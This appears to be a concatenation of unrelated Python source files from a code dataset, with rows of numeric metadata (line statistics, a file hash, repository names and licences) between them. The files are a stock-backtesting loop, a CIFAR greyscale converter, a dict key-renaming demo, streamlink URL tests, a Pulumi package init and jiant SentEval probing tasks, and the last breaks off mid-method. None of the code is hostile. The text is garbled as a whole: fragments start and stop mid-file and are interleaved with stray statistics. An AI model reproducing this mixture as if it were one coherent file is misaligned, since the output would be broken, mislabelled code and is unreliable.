            #cur_merge_df=cur_merge_df.sort_values(by=['last_mix_rank'])
            buylist=cur_merge_df
            #single code no repeat
            buylist=buylist[~buylist['ts_code'].isin(codelist['ts_code'])]
            #buylist=buylist[buylist['pct_chg']<4]
            #buylist=buylist[buylist['open']!=buylist['up_limit']]
            #buylist=buylist[buylist['pct_chg']>-9]
            if choicepolicy=="random":
                # Liquidity/price filters, then a deterministic shuffle.
                buylist=buylist[buylist['last_amount']>1000]
                buylist=buylist[buylist['last_close']<120]
                #buylist = buylist[buylist['amount']>2000]
                buylist = shuffle(buylist,random_state=12)
            if choicepolicy=="small":
                pass
                #print(buylist)
                # Liquidity/price filters, then rank ascending by yesterday's score.
                buylist=buylist[buylist['last_amount']>1500]
                buylist=buylist[buylist['last_close']<120]
                #buylist = buylist[buylist['open']<120]
                #buylist['amount_rank']=buylist['amount'].rank(pct=True)
                #buylist = buylist[buylist['amount_rank']>0.9]
                #buylist = buylist[buylist['amount']>5000]
                buylist=buylist.sort_values(by=['last_mix_rank'])
                #print(buylist)
                #print(buylist)
            # Take the top-scoring buynum candidates (tail = highest rank after ascending sort).
            buylist=buylist.tail(buynum)
            # Units per name: equal cash slices, rounded to lots of 100.
            buylist.loc[:,'buyuse']=code_amount_buy/buylist['open']
            #buylist['buyuse']=code_amount_buy/buylist['close']
            buylist.loc[:,'buyuse']=buylist['buyuse'].round(-2)
            buylist.loc[:,'buyuse']=buylist['buyuse'].astype(int)
            buylist['value']=buylist['open']*buylist['buyuse']
            #seelist=buylist[['ts_code','trade_date','yesterday_1total_mv_rank']]
            #print(seelist)
            account=account-buylist['value'].sum()
            # Control flag handed to the next day; 0 = no pending action.
            buylist['last_action_flag']=0
            savebuylist=buylist[['ts_code','open','buyuse','last_action_flag']]
            savebuylist.columns = ['ts_code','lastprice','buy_amount','last_action_flag']
            codelist=codelist.append(savebuylist)
            #todo The next iteration relies on the index when dropping rows; reset it here (optimize later if speed matters).
            codelist.reset_index(inplace=True,drop=True)
            cur_hold_num+=buynum
            sdfafa=1
        #print(codelist)
        #codelist_buffer=pd.merge(codelist,cur_merge_df, how='left', on=['ts_code'])
        # Mark the portfolio to market and record today's total equity.
        bufferdf=codelist['buy_amount']*codelist['lastprice']
        if(cur_date>20200805):
            pass
            #print(codelist)
        #print(codelist)
        code_value_sum=bufferdf.sum()
        print(account+code_value_sum)
        print(cur_date)
        show3.append(account+code_value_sum)
        # Keep today's scores/amount/close for tomorrow's decisions.
        last_cur_merge_df=cur_merge_df[["ts_code","mix_rank","amount","close"]]
        last_cur_merge_df.columns =['ts_code','last_mix_rank','last_amount',"last_close"]
        #print(last_cur_merge_df)
        days+=1
    # X axis: 1..N trading days; label every 5th tick with its trade date.
    days=np.arange(1,datelist.shape[0]+1)
    eee=np.where(days%5==0)
    daysshow=days[eee]
    datashow=datelist[eee]
    #a = np.random.rand(days.shape[0], 1)
    #a=np.array(show3)
    #np.save('a.npy',a) # save as .npy
    #a=np.load('a.npy')
    #a=a.tolist()
    #print(a)
    #plt.plot(days,a,c='red',label='CB')
    if True :
        #000001.SH SSE Composite, 000016.SH SSE 50, 000688.SH STAR 50, 000905.SH CSI 500, 399006.SZ ChiNext
        #399300.SZ CSI 300, 000852.SH CSI 1000
        baselinecode='399300.SZ'
        baseline1=self.display_baseline(datelist,accountbase,baselinecode)
        plt.plot(days,baseline1,c='m',label=baselinecode)
        baselinecode='399006.SZ'
        baseline2=self.display_baseline(datelist,accountbase,baselinecode)
        plt.plot(days,baseline2,c='c',label=baselinecode)
        baselinecode='000852.SH'
        baseline3=self.display_baseline(datelist,accountbase,baselinecode)
        plt.plot(days,baseline3,c='y',label=baselinecode)
        baselinecode='000905.SH'
        baseline4=self.display_baseline(datelist,accountbase,baselinecode)
        plt.plot(days,baseline4,c='k',label=baselinecode)
        print(show3)
        plt.plot(days,show3,c='green',label="TOPK_open_CB")
        plt.xticks(daysshow, datashow,color='blue',rotation=60)
        plt.legend()
        plt.show()
    input()
    asdffd=1
def display_baseline(self,datelist,accountbase,basecode='399300.SZ'):
    """Return an index baseline curve rescaled to the backtest's starting cash.

    Refreshes the index CSV via CSZLData, keeps only the trade dates present
    in `datelist`, and scales the close series so its first value equals
    `accountbase`.

    Fixes vs. the original: removed the no-op `if(True):` wrapper and the
    redundant `index_name` alias; added `.copy()` so the in-place sort and
    column assignment operate on an owned frame instead of a slice of
    `index_baseline` (avoids pandas SettingWithCopyWarning / ambiguity).

    Args:
        datelist: iterable of trade dates (same representation as the CSV's
            `trade_date` column) to align on.
        accountbase: starting account value the curve is normalised to.
        basecode: index ts_code, e.g. '399300.SZ'.

    Returns:
        pandas Series of scaled close values, one per matched trade date.
    """
    # Ensure the index CSV exists / is up to date.
    CSZLData.CSZLDataWithoutDate.get_baseline(basecode)
    index_path='./Database/indexdata/'+basecode+'.csv'
    index_baseline=pd.read_csv(index_path,index_col=0,header=0)
    # Own the data before mutating it in place.
    index_use=index_baseline[['trade_date','close']].copy()
    index_use.sort_values(by=['trade_date'],ascending=True, inplace=True)
    index_use=index_use[index_use['trade_date'].isin(datelist)]
    # Scale so the first aligned close equals the starting account value.
    # NOTE(review): raises IndexError if datelist and the index share no dates.
    basepoint=index_use['close'].values[0]
    index_use['close']=index_use['close']*accountbase/basepoint
    return index_use['close']
| 41.434644
| 232
| 0.600821
| 4,528
| 38,990
| 4.871025
| 0.066917
| 0.173921
| 0.028564
| 0.044206
| 0.952711
| 0.946591
| 0.941966
| 0.934258
| 0.934077
| 0.927639
| 0
| 0.031032
| 0.266915
| 38,990
| 941
| 233
| 41.434644
| 0.740615
| 0.257861
| 0
| 0.847981
| 0
| 0
| 0.137753
| 0.007432
| 0
| 0
| 0
| 0.001063
| 0
| 1
| 0.009501
| false
| 0.004751
| 0.014252
| 0
| 0.028504
| 0.035629
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
659ea91356929f022302c5c496e090adddcab540
| 4,299
|
py
|
Python
|
Source/CIFAR/utils.py
|
Theonik/Convnet-demo
|
ba80f65826cca9485c04ac6322bc752232a8b1b6
|
[
"Apache-2.0"
] | null | null | null |
Source/CIFAR/utils.py
|
Theonik/Convnet-demo
|
ba80f65826cca9485c04ac6322bc752232a8b1b6
|
[
"Apache-2.0"
] | null | null | null |
Source/CIFAR/utils.py
|
Theonik/Convnet-demo
|
ba80f65826cca9485c04ac6322bc752232a8b1b6
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from math import sqrt
def convert_set_to_greyscale(cifar_set, method=0, gamma=1.0):
    """Convert a CIFAR batch of shape (N, 3, H, W) to greyscale (N, 1, H, W).

    Fixes vs. the original:
      * Python 2 ``print`` statements replaced with the ``print()`` function
        (the originals are syntax errors under Python 3).
      * The per-image/per-row/per-pixel Python loops are replaced by
        vectorized NumPy arithmetic — same math, vastly faster.

    Args:
        cifar_set: numpy array (N, 3, H, W); RGB intensities in [0, 255].
        method: 0 = rec.709 luminance, 1 = NTSC/W3C luminance,
                2 = root of NTSC-weighted squares, 3 = root of rec.709-weighted
                squares, 4 = plain channel mean. Any other value prints an
                error and returns the colour set scaled to [0, 1].
        gamma: accepted for interface compatibility; unused, exactly as in
               the original — TODO confirm intended.

    Returns:
        float32 array (N, 1, H, W) scaled to [0, 1], or the colour set
        scaled to [0, 1] when `method` is invalid.
    """
    weights = {
        0: (0.2126, 0.7152, 0.0722),  # rec.709 luminance
        1: (0.299, 0.587, 0.114),     # NTSC/W3C luminance
        2: (0.299, 0.587, 0.114),     # NTSC weights, root-of-squares form
        3: (0.2126, 0.7152, 0.0722),  # rec.709 weights, root-of-squares form
    }
    if method not in (0, 1, 2, 3, 4):
        print('Error: This is not a valid conversion mode.\n Reverting to colour.')
        return cifar_set.astype('float32') / 255
    # Work in float64 (matching the original per-pixel Python-float math),
    # cast to float32 only at the end.
    r = cifar_set[:, 0].astype('float64')
    g = cifar_set[:, 1].astype('float64')
    b = cifar_set[:, 2].astype('float64')
    if method in (0, 1):
        wr, wg, wb = weights[method]
        grey = wr * r + wg * g + wb * b
    elif method in (2, 3):
        wr, wg, wb = weights[method]
        grey = np.sqrt((wr * r) ** 2 + (wg * g) ** 2 + (wb * b) ** 2)
    else:  # method == 4: simple mean of RGB intensity
        grey = (r + g + b) / 3
    converted_set = (grey / 255)[:, np.newaxis, :, :].astype('float32')
    print('Converted ', len(converted_set), ' images to greyscale.')
    return converted_set
def convert_image_to_greyscale(cifar_set, method=0, gamma=1.0):
    """Convert one CIFAR image of shape (3, H, W) to greyscale (1, H, W).

    Fixes vs. the original:
      * Bug: the loop iterated ``image[0]`` but ``image`` was never defined,
        so every call raised NameError. The conversion now reads `cifar_set`.
      * Python 2 ``print`` replaced with ``print()``; per-pixel loops
        vectorized with NumPy (same math).

    Args:
        cifar_set: numpy array (3, H, W); RGB intensities in [0, 255].
        method: same conversion modes as convert_set_to_greyscale.
        gamma: accepted for interface compatibility; unused, as before.

    Returns:
        float32 array (1, H, W) scaled to [0, 1], or the colour image scaled
        to [0, 1] when `method` is invalid.
    """
    weights = {
        0: (0.2126, 0.7152, 0.0722),  # rec.709 luminance
        1: (0.299, 0.587, 0.114),     # NTSC/W3C luminance
        2: (0.299, 0.587, 0.114),     # NTSC weights, root-of-squares form
        3: (0.2126, 0.7152, 0.0722),  # rec.709 weights, root-of-squares form
    }
    if method not in (0, 1, 2, 3, 4):
        print('Error: This is not a valid conversion mode.\n Reverting to colour.')
        return cifar_set.astype('float32') / 255
    r = cifar_set[0].astype('float64')
    g = cifar_set[1].astype('float64')
    b = cifar_set[2].astype('float64')
    if method in (0, 1):
        wr, wg, wb = weights[method]
        grey = wr * r + wg * g + wb * b
    elif method in (2, 3):
        wr, wg, wb = weights[method]
        grey = np.sqrt((wr * r) ** 2 + (wg * g) ** 2 + (wb * b) ** 2)
    else:  # method == 4: simple mean of RGB
        grey = (r + g + b) / 3
    return (grey / 255)[np.newaxis, :, :].astype('float32')
| 62.304348
| 104
| 0.531054
| 553
| 4,299
| 3.878843
| 0.122966
| 0.149184
| 0.193939
| 0.268531
| 0.868531
| 0.854545
| 0.854545
| 0.825641
| 0.81958
| 0.685315
| 0
| 0.076731
| 0.348221
| 4,299
| 69
| 105
| 62.304348
| 0.688794
| 0.028146
| 0
| 0.34375
| 0
| 0
| 0.045781
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.03125
| null | null | 0.046875
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
65b938cf609fdca2021e5f09f94aa377807a7c58
| 2,142
|
py
|
Python
|
notebook/dict_change_key.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 174
|
2018-05-30T21:14:50.000Z
|
2022-03-25T07:59:37.000Z
|
notebook/dict_change_key.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 5
|
2019-08-10T03:22:02.000Z
|
2021-07-12T20:31:17.000Z
|
notebook/dict_change_key.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 53
|
2018-04-27T05:26:35.000Z
|
2022-03-25T07:59:37.000Z
|
# Demo: rename a dict key manually — copy the value to the new key, delete the old one.
d = {'k1': 1, 'k2': 2, 'k3': 3}
d['k10'] = d['k1']
del d['k1']
print(d)
# {'k2': 2, 'k3': 3, 'k10': 1}
# Demo: dict.pop() removes a key and returns its value.
d = {'k1': 1, 'k2': 2, 'k3': 3}
print(d.pop('k1'))
# 1
print(d)
# {'k2': 2, 'k3': 3}
# Demo: rename in a single statement via pop().
d = {'k1': 1, 'k2': 2, 'k3': 3}
d['k10'] = d.pop('k1')
print(d)
# {'k2': 2, 'k3': 3, 'k10': 1}
# Demo: pop() on a missing key raises KeyError unless a default is supplied.
d = {'k1': 1, 'k2': 2, 'k3': 3}
# print(d.pop('k10'))
# KeyError: 'k10'
print(d.pop('k10', None))
# None
print(d)
# {'k1': 1, 'k2': 2, 'k3': 3}
def change_dict_key(d, old_key, new_key, default_value=None):
    """Rename *old_key* to *new_key* in dict *d*, in place.

    When *old_key* is absent, *new_key* is set to *default_value*.
    An existing *new_key* entry is overwritten.
    """
    value = d.pop(old_key, default_value)
    d[new_key] = value
# Demo: basic rename.
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key(d, 'k1', 'k10')
print(d)
# {'k2': 2, 'k3': 3, 'k10': 1}
# Demo: missing old key stores the default (None).
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key(d, 'k10', 'k100')
print(d)
# {'k1': 1, 'k2': 2, 'k3': 3, 'k100': None}
# Demo: missing old key with an explicit default.
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key(d, 'k10', 'k100', 100)
print(d)
# {'k1': 1, 'k2': 2, 'k3': 3, 'k100': 100}
# Caveat: renaming onto an existing key overwrites its value.
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key(d, 'k1', 'k2')
print(d)
# {'k2': 1, 'k3': 3}
def change_dict_key_setdefault(d, old_key, new_key, default_value=None):
    """Rename *old_key* to *new_key* in *d* without overwriting *new_key*.

    *old_key* is removed even when *new_key* already exists; when *old_key*
    is absent, *default_value* is offered to setdefault instead.
    """
    value = d.pop(old_key, default_value)
    d.setdefault(new_key, value)
# Demo: existing new key wins; the old key is still removed.
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key_setdefault(d, 'k1', 'k2')
print(d)
# {'k2': 2, 'k3': 3}
# Demo: normal rename when the new key is absent.
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key_setdefault(d, 'k1', 'k10')
print(d)
# {'k2': 2, 'k3': 3, 'k10': 1}
# Demo: missing old key stores the default (None).
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key_setdefault(d, 'k10', 'k100')
print(d)
# {'k1': 1, 'k2': 2, 'k3': 3, 'k100': None}
def change_dict_key_exist(d, old_key, new_key):
    """Rename *old_key* to *new_key* in *d* only when *old_key* exists.

    An existing *new_key* entry is overwritten; a missing *old_key* leaves
    *d* untouched.
    """
    try:
        d[new_key] = d.pop(old_key)
    except KeyError:
        # old_key absent: nothing to rename.
        pass
# Demo: normal rename when the old key exists.
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key_exist(d, 'k1', 'k10')
print(d)
# {'k2': 2, 'k3': 3, 'k10': 1}
# Demo: missing old key leaves the dict unchanged (no default entry added).
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key_exist(d, 'k10', 'k100')
print(d)
# {'k1': 1, 'k2': 2, 'k3': 3}
# Caveat: renaming onto an existing key still overwrites it.
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key_exist(d, 'k1', 'k2')
print(d)
# {'k2': 1, 'k3': 3}
def change_dict_key_exist_setdefault(d, old_key, new_key):
    """Rename *old_key* to *new_key* in *d*; never overwrite *new_key*.

    A missing *old_key* leaves *d* untouched. When both keys exist,
    *old_key* is removed and *new_key* keeps its original value.
    """
    try:
        value = d.pop(old_key)
    except KeyError:
        # old_key absent: nothing to rename.
        return
    d.setdefault(new_key, value)
# Demo: both keys exist — old key removed, new key's value preserved.
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key_exist_setdefault(d, 'k1', 'k2')
print(d)
# {'k2': 2, 'k3': 3}
| 20.796117
| 72
| 0.521942
| 415
| 2,142
| 2.539759
| 0.06506
| 0.085389
| 0.132827
| 0.159393
| 0.950664
| 0.93074
| 0.891841
| 0.891841
| 0.858634
| 0.783681
| 0
| 0.137892
| 0.180672
| 2,142
| 102
| 73
| 21
| 0.462678
| 0.216153
| 0
| 0.571429
| 0
| 0
| 0.10006
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0
| 0
| 0.071429
| 0.303571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
02b6b7a182395dbb970279f055b75b84fcc0665e
| 1,219
|
py
|
Python
|
tests/plugins/test_ltv_lsm_lv.py
|
hymer-up/streamlink
|
f09bf6e04cddc78eceb9ded655f716ef3ee4b84f
|
[
"BSD-2-Clause"
] | 5
|
2017-03-21T19:43:17.000Z
|
2018-10-03T14:04:29.000Z
|
tests/plugins/test_ltv_lsm_lv.py
|
hymer-up/streamlink
|
f09bf6e04cddc78eceb9ded655f716ef3ee4b84f
|
[
"BSD-2-Clause"
] | 7
|
2016-10-13T23:29:31.000Z
|
2018-06-28T14:04:32.000Z
|
tests/plugins/test_ltv_lsm_lv.py
|
bumplzz69/streamlink
|
34abc43875d7663ebafa241573dece272e93d88b
|
[
"BSD-2-Clause"
] | 2
|
2021-02-09T14:29:21.000Z
|
2021-05-28T11:10:34.000Z
|
import unittest
from streamlink.plugins.ltv_lsm_lv import LtvLsmLv
class TestPluginLtvLsmLv(unittest.TestCase):
    """URL-matching tests for the LtvLsmLv streamlink plugin."""

    def test_can_handle_url(self):
        # URLs the plugin should claim (http and https variants).
        for url in (
            "https://ltv.lsm.lv/lv/tieshraide/example/",
            "http://ltv.lsm.lv/lv/tieshraide/example/",
            "https://ltv.lsm.lv/lv/tieshraide/example/live.123/",
            "http://ltv.lsm.lv/lv/tieshraide/example/live.123/",
        ):
            self.assertTrue(LtvLsmLv.can_handle_url(url))

    def test_can_handle_url_negative(self):
        # URLs the plugin should reject.
        for url in (
            "https://ltv.lsm.lv",
            "http://ltv.lsm.lv",
            "https://ltv.lsm.lv/lv",
            "http://ltv.lsm.lv/lv",
            "https://ltv.lsm.lv/other-site/",
            "http://ltv.lsm.lv/other-site/",
            "https://ltv.lsm.lv/lv/other-site/",
            "http://ltv.lsm.lv/lv/other-site/",
        ):
            self.assertFalse(LtvLsmLv.can_handle_url(url))
| 55.409091
| 102
| 0.724364
| 175
| 1,219
| 4.857143
| 0.165714
| 0.148235
| 0.197647
| 0.282353
| 0.868235
| 0.823529
| 0.812941
| 0.812941
| 0.796471
| 0.796471
| 0
| 0.00552
| 0.108285
| 1,219
| 21
| 103
| 58.047619
| 0.776449
| 0
| 0
| 0
| 0
| 0
| 0.311731
| 0
| 0
| 0
| 0
| 0
| 0.705882
| 1
| 0.117647
| false
| 0
| 0.117647
| 0
| 0.294118
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
02c216866f75efc46d0d664236cd942d9adb4921
| 649
|
py
|
Python
|
sdk/python/pulumi_google_native/containeranalysis/v1alpha1/__init__.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 44
|
2021-04-18T23:00:48.000Z
|
2022-02-14T17:43:15.000Z
|
sdk/python/pulumi_google_native/containeranalysis/v1alpha1/__init__.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 354
|
2021-04-16T16:48:39.000Z
|
2022-03-31T17:16:39.000Z
|
sdk/python/pulumi_google_native/containeranalysis/v1alpha1/__init__.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 8
|
2021-04-24T17:46:51.000Z
|
2022-01-05T10:40:21.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from ... import _utilities
import typing
# Export this package's modules as members:
from ._enums import *
from .get_note import *
from .get_note_iam_policy import *
from .get_occurrence import *
from .get_occurrence_iam_policy import *
from .get_provider_note_iam_policy import *
from .note import *
from .note_iam_policy import *
from .occurrence import *
from .occurrence_iam_policy import *
from .provider_note_iam_policy import *
from ._inputs import *
from . import outputs
| 30.904762
| 80
| 0.768875
| 98
| 649
| 4.867347
| 0.44898
| 0.251572
| 0.188679
| 0.238994
| 0.360587
| 0.129979
| 0
| 0
| 0
| 0
| 0
| 0.001815
| 0.151002
| 649
| 20
| 81
| 32.45
| 0.863884
| 0.312789
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
02de662220a766e589d3bc5ef62b920d69c494c2
| 18,235
|
py
|
Python
|
jiant/tasks/senteval_probing.py
|
pitrack/jiant
|
787e78baa50e4b6eb19f809934d161cab31a2c7d
|
[
"MIT"
] | null | null | null |
jiant/tasks/senteval_probing.py
|
pitrack/jiant
|
787e78baa50e4b6eb19f809934d161cab31a2c7d
|
[
"MIT"
] | null | null | null |
jiant/tasks/senteval_probing.py
|
pitrack/jiant
|
787e78baa50e4b6eb19f809934d161cab31a2c7d
|
[
"MIT"
] | null | null | null |
"""
Set of probing tasks that were added to Senteval Probing.
Paper: https://arxiv.org/abs/1805.01070
"""
import collections
import itertools
import json
import logging as log
import os
import numpy as np
import pandas as pd
import torch
# Fields for instance processing
from jiant.utils.data_loaders import tokenize_and_truncate
from jiant.tasks.registry import register_task # global task registry
from jiant.tasks.tasks import SingleClassificationTask, process_single_pair_task_split
@register_task("se-probing-sentence-length", rel_path="sentence_length/")
class SEProbingSentenceLengthTask(SingleClassificationTask):
    """SentEval probing task: classify a sentence into a length bucket."""

    def __init__(self, path, max_seq_len, name, **kw):
        """ """
        super(SEProbingSentenceLengthTask, self).__init__(name, n_classes=7, **kw)
        self.path = path
        self.max_seq_len = max_seq_len
        self._label_namespace = self.name + "_tags"
        # Filled in by load_data().
        self.train_data_text = None
        self.val_data_text = None
        self.test_data_text = None

    def get_all_labels(self):
        # Stringified bucket ids "0".."5".
        # NOTE(review): 6 labels vs n_classes=7 above — confirm which is intended.
        return [str(bucket) for bucket in range(6)]

    def get_sentences(self):
        return self.sentences

    def load_data(self):
        """Read train/val/test CSVs; sentences from column "2", labels from column "1"."""

        def _read_split(csv_path):
            frame = pd.read_csv(csv_path, encoding="utf-8")
            # Shuffle rows so example order is not the file order.
            frame = frame.sample(frac=1, axis=0).reset_index(drop=True)
            frame["s1"] = frame["2"].apply(
                lambda sent: tokenize_and_truncate(self._tokenizer_name, sent, self.max_seq_len)
            )
            return frame["s1"].tolist(), [], frame["1"].tolist(), list(range(len(frame)))

        self.train_data_text = _read_split(os.path.join(self.path, "train.csv"))
        self.val_data_text = _read_split(os.path.join(self.path, "val.csv"))
        self.test_data_text = _read_split(os.path.join(self.path, "test.csv"))
        sentences = []
        for split_name in ["train", "val", "test"]:
            sentences.extend(getattr(self, "%s_data_text" % split_name)[0])
        self.sentences = sentences
@register_task("se-probing-bigram-shift", rel_path="bigram_shift/")
class SEProbingBigramShiftTask(SingleClassificationTask):
    """SentEval probing task: binary bigram-shift classification."""

    def __init__(self, path, max_seq_len, name, **kw):
        """ """
        super(SEProbingBigramShiftTask, self).__init__(name, n_classes=2, **kw)
        self.path = path
        self.max_seq_len = max_seq_len
        self._label_namespace = self.name + "_tags"
        # Filled in by load_data().
        self.train_data_text = None
        self.val_data_text = None
        self.test_data_text = None

    def get_all_labels(self):
        # Two-way labels; presumably "I" = inverted, "O" = original — confirm upstream.
        return ["I", "O"]

    def get_sentences(self):
        return self.sentences

    def process_split(self, split, indexers, model_preprocessing_interface):
        # Single-sentence classification; labels are strings, so no index skipping.
        return process_single_pair_task_split(
            split,
            indexers,
            model_preprocessing_interface,
            label_namespace=self._label_namespace,
            is_pair=False,
            skip_indexing=False,
        )

    def load_data(self):
        """Read train/val/test CSVs; sentences from column "2", labels from column "1"."""

        def _read_split(csv_path):
            frame = pd.read_csv(csv_path, encoding="utf-8")
            frame["s1"] = frame["2"].apply(
                lambda sent: tokenize_and_truncate(self._tokenizer_name, sent, self.max_seq_len)
            )
            return frame["s1"].tolist(), [], frame["1"].tolist(), list(range(len(frame)))

        self.train_data_text = _read_split(os.path.join(self.path, "train.csv"))
        self.val_data_text = _read_split(os.path.join(self.path, "val.csv"))
        self.test_data_text = _read_split(os.path.join(self.path, "test.csv"))
        sentences = []
        for split_name in ["train", "val", "test"]:
            sentences.extend(getattr(self, "%s_data_text" % split_name)[0])
        self.sentences = sentences
@register_task("se-probing-past-present", rel_path="past_present/")
class SEProbingPastPresentTask(SingleClassificationTask):
    """Probing task: classify the main verb's tense as past or present."""

    def __init__(self, path, max_seq_len, name, **kw):
        """Store the data directory and truncation length; call load_data() later."""
        super(SEProbingPastPresentTask, self).__init__(name, n_classes=2, **kw)
        self.path = path
        self.max_seq_len = max_seq_len
        self._label_namespace = self.name + "_tags"
        # Split caches; populated by load_data().
        self.train_data_text = None
        self.val_data_text = None
        self.test_data_text = None

    def get_all_labels(self):
        return ["PAST", "PRES"]

    def get_sentences(self):
        return self.sentences

    def process_split(self, split, indexers, model_preprocessing_interface):
        # One sentence per example; labels are indexed through the vocabulary.
        return process_single_pair_task_split(
            split,
            indexers,
            model_preprocessing_interface,
            label_namespace=self._label_namespace,
            is_pair=False,
            skip_indexing=False,
        )

    def load_data(self):
        """Read and tokenize the three CSV splits, then cache all sentences."""

        def _load_one(csv_file):
            df = pd.read_csv(csv_file, encoding="utf-8")
            tokenized = [
                tokenize_and_truncate(self._tokenizer_name, text, self.max_seq_len)
                for text in df["2"]
            ]
            return tokenized, [], df["1"].tolist(), list(range(len(df)))

        self.train_data_text = _load_one(os.path.join(self.path, "train.csv"))
        self.val_data_text = _load_one(os.path.join(self.path, "val.csv"))
        self.test_data_text = _load_one(os.path.join(self.path, "test.csv"))
        all_sentences = []
        for split_data in (self.train_data_text, self.val_data_text, self.test_data_text):
            all_sentences += split_data[0]
        self.sentences = all_sentences
@register_task("se-probing-odd-man-out", rel_path="odd_man_out/")
class SEProbingOddManOutTask(SingleClassificationTask):
    """Probing task: detect whether a word was replaced by an odd one out."""

    def __init__(self, path, max_seq_len, name, **kw):
        """Keep the data path and token limit; load_data() fills the splits."""
        super(SEProbingOddManOutTask, self).__init__(name, n_classes=2, **kw)
        self.path = path
        self.max_seq_len = max_seq_len
        self._label_namespace = self.name + "_tags"
        # Per-split caches, filled in by load_data().
        self.train_data_text = None
        self.val_data_text = None
        self.test_data_text = None

    def get_all_labels(self):
        return ["C", "O"]

    def process_split(self, split, indexers, model_preprocessing_interface):
        # Single-sentence classification routed through the pair-task helper.
        return process_single_pair_task_split(
            split,
            indexers,
            model_preprocessing_interface,
            label_namespace=self._label_namespace,
            is_pair=False,
            skip_indexing=False,
        )

    def get_sentences(self):
        return self.sentences

    def load_data(self):
        """Read the three CSV splits and cache every tokenized sentence."""

        def _read_split(csv_path):
            frame = pd.read_csv(csv_path, encoding="utf-8")
            frame["s1"] = frame["2"].apply(
                lambda text: tokenize_and_truncate(self._tokenizer_name, text, self.max_seq_len)
            )
            return frame["s1"].tolist(), [], frame["1"].tolist(), list(range(len(frame)))

        for split_name in ("train", "val", "test"):
            setattr(
                self,
                split_name + "_data_text",
                _read_split(os.path.join(self.path, split_name + ".csv")),
            )
        self.sentences = [
            sent
            for split_name in ("train", "val", "test")
            for sent in getattr(self, split_name + "_data_text")[0]
        ]
@register_task("se-probing-coordination-inversion", rel_path="coordination_inversion/")
class SEProbingCoordinationInversionTask(SingleClassificationTask):
    """Probing task: detect whether two coordinated clauses were swapped."""

    def __init__(self, path, max_seq_len, name, **kw):
        """Store the data directory and truncation length; call load_data() later."""
        super(SEProbingCoordinationInversionTask, self).__init__(name, n_classes=2, **kw)
        self.path = path
        self.max_seq_len = max_seq_len
        self._label_namespace = self.name + "_tags"
        # Split caches; populated by load_data().
        self.train_data_text = None
        self.val_data_text = None
        self.test_data_text = None

    def get_all_labels(self):
        return ["O", "I"]

    def get_sentences(self):
        return self.sentences

    def process_split(self, split, indexers, model_preprocessing_interface):
        # One sentence per example; labels are indexed through the vocabulary.
        return process_single_pair_task_split(
            split,
            indexers,
            model_preprocessing_interface,
            label_namespace=self._label_namespace,
            is_pair=False,
            skip_indexing=False,
        )

    def load_data(self):
        """Read and tokenize the three CSV splits, then cache all sentences."""

        def _load_one(csv_file):
            df = pd.read_csv(csv_file, encoding="utf-8")
            tokenized = [
                tokenize_and_truncate(self._tokenizer_name, text, self.max_seq_len)
                for text in df["2"]
            ]
            return tokenized, [], df["1"].tolist(), list(range(len(df)))

        self.train_data_text = _load_one(os.path.join(self.path, "train.csv"))
        self.val_data_text = _load_one(os.path.join(self.path, "val.csv"))
